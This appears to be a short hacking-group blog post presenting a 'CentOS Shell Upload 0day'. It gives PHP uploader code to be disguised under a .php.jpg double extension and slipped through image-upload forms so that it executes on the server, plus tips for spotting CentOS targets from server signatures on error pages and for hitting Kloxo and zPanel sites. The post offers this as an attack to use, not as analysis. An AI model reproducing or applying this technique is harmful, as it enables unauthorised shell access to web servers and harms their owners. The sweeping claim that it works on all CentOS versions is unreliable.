CentOS Shell Upload 0day
Code:
<br>
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input
name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?> and save it with anything like safdar.php.jpgBut it must be in image format like jpg,jpeg,png etc etc. Once you have saved it, your computer will open and show that image as a
normal picture. In that case when you upload it on a CentOS server that
allows image upload, the system detects the image code and thinks its
safe to upload. Once it is uploaded, CentOS server gets confused and
takes that image as a normal .php file.
Open that image with the php code that you uploaded, and Wallahh !
How to know if a server is running on CentOS ?
You can see it by HTTP Live Header. If you don't know much about HTTP
Live header, try to make the site give you an error like 404 Page not
found or 403 Forbidden. On that page, see servers signature. You will
see it like Apache/2.2.15 (CentOS) Server at http://www.target.com Port 80
Example: http://domain.me/files/ Works on all CentOS versions.
Sites that are using Kloxo and zPanel can be in danger.
This exploit/vulnerability was discovered by 1337 from TeaM MaDLeeTs
http://www.MaDLeeTs.com CentOS Shell Upload 0day
0 comments:
Post a Comment